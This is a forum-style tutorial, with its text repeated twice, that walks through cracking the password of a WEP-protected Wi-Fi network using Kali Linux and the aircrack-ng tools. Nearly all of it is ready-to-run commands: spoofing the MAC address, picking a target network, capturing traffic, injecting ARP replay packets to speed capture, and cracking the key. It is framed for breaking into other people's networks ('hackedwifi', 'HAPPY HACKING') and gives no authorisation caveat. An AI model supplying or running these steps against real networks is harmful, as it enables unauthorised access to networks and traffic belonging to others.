Here It Is our first tutorials about Hacking Wifi (Wep Network only)
Hack WEP
Requirements :
1 Kali Linux
2 Network Adapter
Steps
Fire up a shell and run commands as following
1. airmon-ng
wlan1 is my interface. these can be variable so yours may be different
next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.
1. airmon-ng stop wlan1 (Stops the wlan1 interface)
2. ifconfig wlan1 down (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1 (restarts the interface with new mac)
Next thing; and this is obviously important, is to pick a network. do this by running this command
1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)
after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password and put it into a file (hackedwifi) or whatever you decide to name it.
the command is as follows:
1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)
e.g. airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1
1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
e.g. aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1
Now that you are associated with the Access point we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:
1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
e.g:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1
Now it's time to wait. You will notice Airodump going crazy collecting data. Personally, sometimes i leave the room or go do something else for about 20 minutes. What you want is to collect enough Data for the cracker. watch the #Data column. i like to wait until it's between 10,000 and 20,000 before i run the cracker.
Ok, it's been about a half hr and it's time to run the cracker. run this command.
1. aircrack-ng -b (bssid) (filename-01.cap)
if you forgot yourfile just type "dir" and it will be a .cap file
HAPPY HACKING
reddevil57
Soon I will post the tutorial about Wpa-Psk Networks :)
Requirements :
1 Kali Linux
2 Network Adapter
Steps
Fire up a shell and run commands as following
1. airmon-ng
wlan1 is my interface. these can be variable so yours may be different
next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.
1. airmon-ng stop wlan1 (Stops the wlan1 interface)
2. ifconfig wlan1 down (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1 (restarts the interface with new mac)
Next thing; and this is obviously important, is to pick a network. do this by running this command
1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)
after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password and put it into a file (hackedwifi) or whatever you decide to name it.
the command is as follows:
1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)
e.g. airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1
1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
e.g. aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1
Now that you are associated with the Access point we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:
1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
e.g:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1
Now it's time to wait. You will notice Airodump going crazy collecting data. Personally, sometimes i leave the room or go do something else for about 20 minutes. What you want is to collect enough Data for the cracker. watch the #Data column. i like to wait until it's between 10,000 and 20,000 before i run the cracker.
Ok, it's been about a half hr and it's time to run the cracker. run this command.
1. aircrack-ng -b (bssid) (filename-01.cap)
if you forgot yourfile just type "dir" and it will be a .cap file
HAPPY HACKING
reddevil57
Soon I will post the tutorial about Wpa-Psk Networks :)